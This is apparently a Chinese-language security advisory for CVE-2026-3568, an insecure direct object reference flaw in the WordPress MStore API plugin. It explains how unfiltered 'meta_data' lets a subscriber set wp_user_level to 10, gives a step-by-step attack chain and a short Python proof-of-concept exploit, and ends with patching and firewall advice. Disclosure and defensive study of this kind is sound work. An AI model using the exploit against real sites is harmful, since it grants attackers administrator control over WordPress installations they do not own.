CVE-2026-3568 CVSS 4.3 中危

CVE-2026-3568 WordPress MStore API IDOR漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-3568

漏洞类型

不安全的直接对象引用 (IDOR)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress MStore API

漏洞概述

WordPress MStore API插件存在不安全的直接对象引用（IDOR）漏洞。由于`update_user_profile()`函数未对用户提交的'meta_data'参数进行严格验证，经过身份验证的低权限攻击者（如订阅者）可利用该漏洞修改自身账户的任意用户元字段，可能导致权限提升或存储型XSS攻击。

技术细节

该漏洞源于`controllers/flutter-user.php`中的`update_user_profile()`函数。该函数从`php://input`读取JSON数据，在通过Cookie验证用户身份后，直接遍历用户输入的`meta_data`数组并调用`update_user_meta()`更新数据库。由于缺乏对元键的验证，攻击者可修改`wp_user_level`等敏感字段（该字段为简单整数，可直接修改）。虽然`wp_capabilities`需要序列化数组而无法直接利用，但修改`wp_user_level`足以通过传统的权限检查提升为管理员，或利用插件特定标志绕过安全控制。

攻击链分析

STEP 1

1. 获取凭证

攻击者在目标WordPress网站注册或获取一个低权限（如订阅者Subscriber）账户。

STEP 2

2. 构造恶意请求

攻击者向`update_user_profile`接口发送POST请求，Cookie中包含低权限凭证，Body中包含修改`wp_user_level`为10的JSON数据。

STEP 3

3. 漏洞利用

服务器端未对`meta_data`中的键进行过滤，直接调用`update_user_meta()`将攻击者的`wp_user_level`更新为10。

STEP 4

4. 权限提升

攻击者刷新页面或利用该字段，通过基于`wp_user_level`的传统权限检查获得管理员权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target API endpoint (Example)
target_url = "http://example.com/wp-json/mstore-api/v1/flutter_user/update_user_profile"

# Attacker's session cookie (Subscriber role)
attacker_cookies = {
    "wordpress_logged_in_hash": "..."
}

# Malicious payload to escalate privileges
payload = {
    "meta_data": {
        "wp_user_level": 10  # Escalate to Administrator (Legacy check)
    }
}

try:
    response = requests.post(target_url, json=payload, cookies=attacker_cookies)
    if response.status_code == 200:
        print("[+] Exploit potentially successful. User meta updated.")
    else:
        print("[-] Exploit failed.")
except Exception as e:
    print(f"Error: {e}")

影响范围

WordPress MStore API <= 4.18.3

防御指南

临时缓解措施

建议立即将插件更新至最新版本。如果暂时无法升级，应配置Web应用防火墙（WAF）规则，检测并拦截包含敏感元键（如wp_user_level、_wpuf_user_active等）的API请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表